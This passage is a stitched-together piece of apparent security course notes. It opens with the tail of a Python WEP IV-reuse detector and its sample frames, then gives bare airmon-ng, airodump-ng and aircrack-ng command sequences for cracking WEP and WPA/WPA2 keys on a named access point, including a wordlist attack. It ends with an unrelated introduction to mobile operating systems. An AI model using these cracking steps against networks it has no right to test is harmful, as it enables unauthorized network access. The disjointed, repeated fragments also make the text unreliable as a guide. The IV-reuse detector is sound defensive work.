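    iv = int.from_bytes(wep_body[:3], "big")
    key_index = wep_body[3] >> 6
    return iv, key_index


def find_iv_reuse(frame_bodies):
    """Return the IVs that occur more than once, sorted. A repeated IV means a
    repeated RC4 keystream, which is exactly what a wireless IDS should flag."""
    seen, reused = set(), set()
    for body in frame_bodies:
        iv, _ = extract_iv(body)
        if iv in seen:
            reused.add(iv)
        seen.add(iv)
    return sorted(reused)


# Constructed sample: IV (3 bytes) + key-index byte + a few encrypted payload bytes.
# A card that resets its IV counter to 0 on restart reuses 0x000001 and 0x000002.
SAMPLE_FRAMES = [
    b"\x00\x00\x01" + b"\x00" + b"\x9a\x1f\xc3",
    b"\x00\x00\x02" + b"\x00" + b"\x42\xd0\x88",
    b"\x00\x00\x03" + b"\x40" + b"\x11\x22\x33",  # key index 1
    b"\x00\x00\x01" + b"\x00" + b"\x7e\x7e\x7e",  # reuse after a reset
    b"\x00\x00\x02" + b"\x00" + b"\x00\x01\x02",  # reuse
]
```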

# Capturing WEP packet

# Cracking

Tools to automate attacks on wireless networks

WEP: (25,000 packets)

ifconfig -a
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
ifconfig -a
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 1 -b C8:D3:A3:2F:D6:F4 -w palvinder mon0
airodump-ng
airodump-ng -c 1 --bssid C8:D3:A3:2F:D6:F4 -w palvinder mon0
ls
aircrack-ng palvinder-02.cap
Attacks On WPA/WPA2

ifconfig -a
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
ifconfig -a
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 1 -b C8:D3:A3:2F:D6:F4 -w palvinder mon0
airodump-ng
airodump-ng -c 1 --bssid C8:D3:A3:2F:D6:F4 -w palvinder mon0
ls
aircrack-ng palvinder-02.cap -w '/root/Desktop/passwords1.lst'

Introduction to Mobile Systems

A mobile operating system (or mobile OS) is an operating system for smartphones,
tablets, PDAs, or other mobile devices. While computers such as the typical laptop are
mobile, the operating systems usually used on them are not considered mobile ones as
they were originally designed for bigger stationary desktop computers that historically
did not have or need specific "mobile" features. This distinction is getting blurred in
some newer operating systems that are hybrids made for both uses.
